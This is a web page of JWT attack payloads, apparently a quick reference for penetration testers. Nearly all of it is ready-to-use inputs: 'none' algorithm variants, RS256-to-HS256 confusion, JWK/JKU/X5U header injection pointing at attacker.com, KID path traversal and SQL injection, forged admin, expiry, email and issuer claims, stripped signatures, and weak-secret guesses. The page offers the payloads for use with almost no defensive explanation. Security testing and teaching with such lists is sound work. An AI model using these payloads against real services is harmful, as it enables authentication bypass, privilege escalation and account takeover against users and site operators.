JWT Attacks Cheat Sheet

JWT attack payloads for algorithm confusion, none algorithm, key injection, and claim manipulation. (20 payloads)

Algorithm Attacks

(6)

{"alg":"none","typ":"JWT"}

None algorithm — remove signature

{"alg":"None","typ":"JWT"}

None with capital N

{"alg":"NONE","typ":"JWT"}

None in all caps

{"alg":"nOnE","typ":"JWT"}

None mixed case

{"alg":"HS256","typ":"JWT"} signed with RSA public key

Algorithm confusion: RS256 → HS256

{"alg":"HS384","typ":"JWT"} signed with RS384 public key

Algorithm confusion: RS384 → HS384

Key Injection

(5)

{"alg":"HS256","typ":"JWT","jwk":{"kty":"oct","k":"<attacker-key>"}}

JWK header injection (embedded key)

{"alg":"RS256","typ":"JWT","jku":"https://attacker.com/.well-known/jwks.json"}

JKU header injection (remote JWKS)

{"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/key.crt"}

X5U header injection (remote cert)

{"alg":"HS256","typ":"JWT","kid":"../../dev/null"}

KID path traversal (empty key)

{"alg":"HS256","typ":"JWT","kid":"key' UNION SELECT 'secret'--"}

KID SQL injection

Claim Manipulation

(5)

{"sub":"admin","role":"admin","iat":...}

Change subject/role to admin

{"exp":9999999999}

Set expiry far in the future

{"sub":"victim","email":"attacker@evil.com"}

Change email claim for account takeover

{"iss":"trusted-issuer"}

Spoof issuer claim

{"aud":"admin-panel"}

Change audience to privileged service

Signature Bypass

(4)

eyJ...eyJ... (no signature part)

Strip signature entirely

eyJ...eyJ...AA==

Empty signature (base64 padding)

Sign with empty string as secret

Weak/empty secret key test

Sign with "secret", "password", "123456"

Common weak secrets wordlist

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

JWT Payloads IDOR

Related Cheat Sheets

CSRF Cheat Sheet CORS Misconfiguration Cheat Sheet

$loading...